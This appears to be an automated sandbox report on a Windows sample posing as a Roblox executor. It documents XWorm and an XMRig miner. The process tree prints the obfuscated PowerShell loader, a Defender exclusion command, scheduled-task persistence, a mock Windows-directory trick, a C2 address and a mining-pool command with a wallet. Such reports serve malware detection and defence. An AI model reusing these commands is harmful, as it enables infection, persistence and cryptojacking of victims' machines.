Analysis
-
max time kernel
33s -
max time network
37s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 12:01
Static task
static1
General
-
Target
RblxExecutor.exe
-
Size
1.6MB
-
MD5
3a235f7f491d95d4727320239c0b4cb7
-
SHA1
b66d02b69f9d2cf011164406c6bc93a6728a65eb
-
SHA256
e9397b42b5c3f7770b873a76355bd59cbe097f30dc9b9349e9787832bbe9767a
-
SHA512
fa40f2d94bbe25372fc5eecb87168c3a55fb3fff1486ebd57d1f944760b43cc77a891fdbc246d5379e02b88b7f4f6abea0c94162e88ff87cabd246c7d8a5d83b
-
SSDEEP
24576:O83AQ99hyIMVdMJgsIX3b9M5Mm2f+qnbyy3q3PIMPKgPe8CWZoPJRMyoE:OWAE9AInJfF8dbRiteGmJKy
Malware Config
Extracted
xworm
185.196.8.135:7000
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4196-56-0x00000204F8AD0000-0x00000204F8AE8000-memory.dmp family_xworm -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
RblxExecutor.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ RblxExecutor.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ RblxExecutor.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ RblxExecutor.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
RblxExecutor.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions RblxExecutor.exe -
Looks for VirtualBox drivers on disk 2 TTPs 4 IoCs
Processes:
RblxExecutor.exedescription ioc process File opened (read-only) C:\Windows\System32\drivers\VBoxMouse.sys RblxExecutor.exe File opened (read-only) C:\Windows\System32\drivers\VBoxGuest.sys RblxExecutor.exe File opened (read-only) C:\Windows\System32\drivers\VBoxSF.sys RblxExecutor.exe File opened (read-only) C:\Windows\System32\drivers\VBoxVideo.sys RblxExecutor.exe -
XMRig Miner payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/4528-145-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4528-144-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4528-148-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4528-150-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4528-151-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4528-149-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig behavioral1/memory/4528-147-0x0000000140000000-0x00000001407CF000-memory.dmp xmrig -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exepowershell.exeflow pid process 21 4196 powershell.exe 30 4196 powershell.exe 31 4116 powershell.exe 35 4116 powershell.exe 37 4116 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4196 powershell.exe 2368 powershell.exe 4056 powershell.exe 5040 powershell.exe 3868 powershell.exe 4116 powershell.exe 3116 powershell.exe -
Looks for VMWare drivers on disk 2 TTPs 2 IoCs
Processes:
RblxExecutor.exedescription ioc process File opened (read-only) C:\Windows\System32\drivers\vmhgfs.sys RblxExecutor.exe File opened (read-only) C:\Windows\System32\drivers\vmmouse.sys RblxExecutor.exe -
Executes dropped EXE 1 IoCs
Processes:
ComputerDefaults.exepid process 1832 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
Processes:
ComputerDefaults.exepid process 1832 ComputerDefaults.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 20 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4116 set thread context of 4528 4116 powershell.exe AddInProcess.exe -
Enumerates processes with tasklist 1 TTPs 8 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 5112 tasklist.exe 4360 tasklist.exe 4304 tasklist.exe 3956 tasklist.exe 4484 tasklist.exe 2744 tasklist.exe 1748 tasklist.exe 4516 tasklist.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
RblxExecutor.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName RblxExecutor.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
Processes:
RblxExecutor.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3288 RblxExecutor.exe 3288 RblxExecutor.exe 4116 powershell.exe 4116 powershell.exe 4196 powershell.exe 4196 powershell.exe 3116 powershell.exe 3116 powershell.exe 2368 powershell.exe 2368 powershell.exe 2368 powershell.exe 4056 powershell.exe 4056 powershell.exe 404 powershell.exe 404 powershell.exe 404 powershell.exe 5040 powershell.exe 5040 powershell.exe 5040 powershell.exe 3920 powershell.exe 3920 powershell.exe 3920 powershell.exe 3868 powershell.exe 3868 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4360 tasklist.exe Token: SeDebugPrivilege 4304 tasklist.exe Token: SeDebugPrivilege 3956 tasklist.exe Token: SeDebugPrivilege 4484 tasklist.exe Token: SeDebugPrivilege 2744 tasklist.exe Token: SeDebugPrivilege 1748 tasklist.exe Token: SeDebugPrivilege 4516 tasklist.exe Token: SeDebugPrivilege 5112 tasklist.exe Token: SeDebugPrivilege 4116 powershell.exe Token: SeDebugPrivilege 4196 powershell.exe Token: SeDebugPrivilege 3116 powershell.exe Token: SeDebugPrivilege 2368 powershell.exe Token: SeDebugPrivilege 4056 powershell.exe Token: SeDebugPrivilege 404 powershell.exe Token: SeIncreaseQuotaPrivilege 404 powershell.exe Token: SeSecurityPrivilege 404 powershell.exe Token: SeTakeOwnershipPrivilege 404 powershell.exe Token: SeLoadDriverPrivilege 404 powershell.exe Token: SeSystemProfilePrivilege 404 powershell.exe Token: SeSystemtimePrivilege 404 powershell.exe Token: SeProfSingleProcessPrivilege 404 powershell.exe Token: SeIncBasePriorityPrivilege 404 powershell.exe Token: SeCreatePagefilePrivilege 404 powershell.exe Token: SeBackupPrivilege 404 powershell.exe Token: SeRestorePrivilege 404 powershell.exe Token: SeShutdownPrivilege 404 powershell.exe Token: SeDebugPrivilege 404 powershell.exe Token: SeSystemEnvironmentPrivilege 404 powershell.exe Token: SeRemoteShutdownPrivilege 404 powershell.exe Token: SeUndockPrivilege 404 powershell.exe Token: SeManageVolumePrivilege 404 powershell.exe Token: 33 404 powershell.exe Token: 34 404 powershell.exe Token: 35 404 powershell.exe Token: 36 404 powershell.exe Token: SeDebugPrivilege 5040 powershell.exe Token: SeIncreaseQuotaPrivilege 5040 powershell.exe Token: SeSecurityPrivilege 5040 powershell.exe Token: SeTakeOwnershipPrivilege 5040 powershell.exe Token: SeLoadDriverPrivilege 5040 powershell.exe Token: SeSystemProfilePrivilege 5040 powershell.exe Token: SeSystemtimePrivilege 5040 powershell.exe Token: SeProfSingleProcessPrivilege 5040 powershell.exe Token: SeIncBasePriorityPrivilege 5040 powershell.exe Token: SeCreatePagefilePrivilege 5040 powershell.exe Token: SeBackupPrivilege 5040 powershell.exe Token: SeRestorePrivilege 5040 powershell.exe Token: SeShutdownPrivilege 5040 powershell.exe Token: SeDebugPrivilege 5040 powershell.exe Token: SeSystemEnvironmentPrivilege 5040 powershell.exe Token: SeRemoteShutdownPrivilege 5040 powershell.exe Token: SeUndockPrivilege 5040 powershell.exe Token: SeManageVolumePrivilege 5040 powershell.exe Token: 33 5040 powershell.exe Token: 34 5040 powershell.exe Token: 35 5040 powershell.exe Token: 36 5040 powershell.exe Token: SeIncreaseQuotaPrivilege 5040 powershell.exe Token: SeSecurityPrivilege 5040 powershell.exe Token: SeTakeOwnershipPrivilege 5040 powershell.exe Token: SeLoadDriverPrivilege 5040 powershell.exe Token: SeSystemProfilePrivilege 5040 powershell.exe Token: SeSystemtimePrivilege 5040 powershell.exe Token: SeProfSingleProcessPrivilege 5040 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AddInProcess.exepid process 4528 AddInProcess.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
RblxExecutor.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3288 wrote to memory of 3928 3288 RblxExecutor.exe cmd.exe PID 3288 wrote to memory of 3928 3288 RblxExecutor.exe cmd.exe PID 3928 wrote to memory of 4360 3928 cmd.exe tasklist.exe PID 3928 wrote to memory of 4360 3928 cmd.exe tasklist.exe PID 3928 wrote to memory of 2896 3928 cmd.exe find.exe PID 3928 wrote to memory of 2896 3928 cmd.exe find.exe PID 3288 wrote to memory of 2288 3288 RblxExecutor.exe cmd.exe PID 3288 wrote to memory of 2288 3288 RblxExecutor.exe cmd.exe PID 2288 wrote to memory of 4304 2288 cmd.exe tasklist.exe PID 2288 wrote to memory of 4304 2288 cmd.exe tasklist.exe PID 2288 wrote to memory of 2608 2288 cmd.exe find.exe PID 2288 wrote to memory of 2608 2288 cmd.exe find.exe PID 3288 wrote to memory of 4272 3288 RblxExecutor.exe cmd.exe PID 3288 wrote to memory of 4272 3288 RblxExecutor.exe cmd.exe PID 4272 wrote to memory of 3956 4272 cmd.exe tasklist.exe PID 4272 wrote to memory of 3956 4272 cmd.exe tasklist.exe PID 4272 wrote to memory of 3040 4272 cmd.exe find.exe PID 4272 wrote to memory of 3040 4272 cmd.exe find.exe PID 3288 wrote to memory of 5056 3288 RblxExecutor.exe cmd.exe PID 3288 wrote to memory of 5056 3288 RblxExecutor.exe cmd.exe PID 5056 wrote to memory of 4484 5056 cmd.exe tasklist.exe PID 5056 wrote to memory of 4484 5056 cmd.exe tasklist.exe PID 5056 wrote to memory of 3584 5056 cmd.exe find.exe PID 5056 wrote to memory of 3584 5056 cmd.exe find.exe PID 3288 wrote to memory of 2128 3288 RblxExecutor.exe cmd.exe PID 3288 wrote to memory of 2128 3288 RblxExecutor.exe cmd.exe PID 2128 wrote to memory of 2744 2128 cmd.exe tasklist.exe PID 2128 wrote to memory of 2744 2128 cmd.exe tasklist.exe PID 2128 wrote to memory of 1724 2128 cmd.exe find.exe PID 2128 wrote to memory of 1724 2128 cmd.exe find.exe PID 3288 wrote to memory of 2928 3288 RblxExecutor.exe cmd.exe PID 3288 wrote to memory of 2928 3288 RblxExecutor.exe cmd.exe PID 2928 wrote to memory of 1748 2928 cmd.exe tasklist.exe PID 2928 wrote to memory of 1748 2928 cmd.exe tasklist.exe PID 2928 wrote to memory of 3280 2928 cmd.exe find.exe PID 2928 wrote to memory of 3280 2928 cmd.exe find.exe PID 3288 wrote to memory of 4408 3288 RblxExecutor.exe cmd.exe PID 3288 wrote to memory of 4408 3288 RblxExecutor.exe cmd.exe PID 4408 wrote to memory of 4516 4408 cmd.exe tasklist.exe PID 4408 wrote to memory of 4516 4408 cmd.exe tasklist.exe PID 4408 wrote to memory of 2160 4408 cmd.exe find.exe PID 4408 wrote to memory of 2160 4408 cmd.exe find.exe PID 3288 wrote to memory of 2028 3288 RblxExecutor.exe cmd.exe PID 3288 wrote to memory of 2028 3288 RblxExecutor.exe cmd.exe PID 2028 wrote to memory of 5112 2028 cmd.exe tasklist.exe PID 2028 wrote to memory of 5112 2028 cmd.exe tasklist.exe PID 2028 wrote to memory of 976 2028 cmd.exe find.exe PID 2028 wrote to memory of 976 2028 cmd.exe find.exe PID 3288 wrote to memory of 4280 3288 RblxExecutor.exe cmd.exe PID 3288 wrote to memory of 4280 3288 RblxExecutor.exe cmd.exe PID 3288 wrote to memory of 4068 3288 RblxExecutor.exe cmd.exe PID 3288 wrote to memory of 4068 3288 RblxExecutor.exe cmd.exe PID 4068 wrote to memory of 3180 4068 cmd.exe cmd.exe PID 4068 wrote to memory of 3180 4068 cmd.exe cmd.exe PID 4280 wrote to memory of 2064 4280 cmd.exe cmd.exe PID 4280 wrote to memory of 2064 4280 cmd.exe cmd.exe PID 4068 wrote to memory of 804 4068 cmd.exe cmd.exe PID 4068 wrote to memory of 804 4068 cmd.exe cmd.exe PID 4068 wrote to memory of 4116 4068 cmd.exe powershell.exe PID 4068 wrote to memory of 4116 4068 cmd.exe powershell.exe PID 4280 wrote to memory of 2104 4280 cmd.exe cmd.exe PID 4280 wrote to memory of 2104 4280 cmd.exe cmd.exe PID 4280 wrote to memory of 4196 4280 cmd.exe powershell.exe PID 4280 wrote to memory of 4196 4280 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\RblxExecutor.exe"C:\Users\Admin\AppData\Local\Temp\RblxExecutor.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare drivers on disk
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmtoolsd.exe" 2>NUL | find /I "vmtoolsd.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq vmtoolsd.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4360 -
C:\Windows\system32\find.exefind /I "vmtoolsd.exe"3⤵PID:2896
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vboxservice.exe" 2>NUL | find /I "vboxservice.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq vboxservice.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4304 -
C:\Windows\system32\find.exefind /I "vboxservice.exe"3⤵PID:2608
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmwaretray.exe" 2>NUL | find /I "vmwaretray.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq vmwaretray.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3956 -
C:\Windows\system32\find.exefind /I "vmwaretray.exe"3⤵PID:3040
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmwareuser.exe" 2>NUL | find /I "vmwareuser.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq vmwareuser.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4484 -
C:\Windows\system32\find.exefind /I "vmwareuser.exe"3⤵PID:3584
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmsrvc.exe" 2>NUL | find /I "vmsrvc.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq vmsrvc.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2744 -
C:\Windows\system32\find.exefind /I "vmsrvc.exe"3⤵PID:1724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq Any.Run-VM-X64.exe" 2>NUL | find /I "Any.Run-VM-X64.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq Any.Run-VM-X64.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1748 -
C:\Windows\system32\find.exefind /I "Any.Run-VM-X64.exe"3⤵PID:3280
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vboxtray.exe" 2>NUL | find /I "vboxtray.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq vboxtray.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4516 -
C:\Windows\system32\find.exefind /I "vboxtray.exe"3⤵PID:2160
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq VBoxService.exe" 2>NUL | find /I "VBoxService.exe" >NUL2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq VBoxService.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5112 -
C:\Windows\system32\find.exefind /I "VBoxService.exe"3⤵PID:976
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\VCRedist.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"3⤵PID:2064
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Al1zbpAcw0p1Fl078pB2HtNXnQs0rbUPPgfd/fVywvU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c9QR5kB90gp/nHGBONlVKA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PUtXp=New-Object System.IO.MemoryStream(,$param_var); $QjusM=New-Object System.IO.MemoryStream; $jUotk=New-Object System.IO.Compression.GZipStream($PUtXp, [IO.Compression.CompressionMode]::Decompress); $jUotk.CopyTo($QjusM); $jUotk.Dispose(); $PUtXp.Dispose(); $QjusM.Dispose(); $QjusM.ToArray();}function execute_function($param_var,$param2_var){ $wbVDd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vzMCH=$wbVDd.EntryPoint; $vzMCH.Invoke($null, $param2_var);}$wGIQB = 'C:\Users\Admin\AppData\Local\Temp\VCRedist.bat';$host.UI.RawUI.WindowTitle = $wGIQB;$pFEsp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wGIQB).Split([Environment]::NewLine);foreach ($QqrJY in $pFEsp) { if ($QqrJY.StartsWith('PDfUAcFoTbCJIUyLDOns')) { $XhjVr=$QqrJY.Substring(20); break; }}$payloads_var=[string[]]$XhjVr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\VCRedists.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"3⤵PID:3180
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW9kWnzh6gT94E6QwCw/S2tqBrnaZOi3/1x2/WmbziY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OAdUsJh095yGIv9rWxpY0Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BRnNz=New-Object System.IO.MemoryStream(,$param_var); $NGgnI=New-Object System.IO.MemoryStream; $wsPQU=New-Object System.IO.Compression.GZipStream($BRnNz, [IO.Compression.CompressionMode]::Decompress); $wsPQU.CopyTo($NGgnI); $wsPQU.Dispose(); $BRnNz.Dispose(); $NGgnI.Dispose(); $NGgnI.ToArray();}function execute_function($param_var,$param2_var){ $IhuXj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KlRZf=$IhuXj.EntryPoint; $KlRZf.Invoke($null, $param2_var);}$dhwZW = 'C:\Users\Admin\AppData\Local\Temp\VCRedists.bat';$host.UI.RawUI.WindowTitle = $dhwZW;$IVamj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dhwZW).Split([Environment]::NewLine);foreach ($qmDVW in $IVamj) { if ($qmDVW.StartsWith('EPPMCDiGgDdpsovvYHWW')) { $utdAo=$qmDVW.Substring(20); break; }}$payloads_var=[string[]]$utdAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:804
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4116 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"4⤵PID:2008
-
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1832 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c call SC.cmd6⤵PID:4092
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"7⤵PID:1264
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW9kWnzh6gT94E6QwCw/S2tqBrnaZOi3/1x2/WmbziY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OAdUsJh095yGIv9rWxpY0Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BRnNz=New-Object System.IO.MemoryStream(,$param_var); $NGgnI=New-Object System.IO.MemoryStream; $wsPQU=New-Object System.IO.Compression.GZipStream($BRnNz, [IO.Compression.CompressionMode]::Decompress); $wsPQU.CopyTo($NGgnI); $wsPQU.Dispose(); $BRnNz.Dispose(); $NGgnI.Dispose(); $NGgnI.ToArray();}function execute_function($param_var,$param2_var){ $IhuXj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KlRZf=$IhuXj.EntryPoint; $KlRZf.Invoke($null, $param2_var);}$dhwZW = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $dhwZW;$IVamj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dhwZW).Split([Environment]::NewLine);foreach ($qmDVW in $IVamj) { if ($qmDVW.StartsWith('EPPMCDiGgDdpsovvYHWW')) { $utdAo=$qmDVW.Substring(20); break; }}$payloads_var=[string[]]$utdAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵PID:3928
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q4⤵PID:1164
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\VCRedists')4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3868 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG_CPU -p x --cpu-max-threads-hint=504⤵
- Suspicious use of FindShellTrayWindow
PID:4528
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
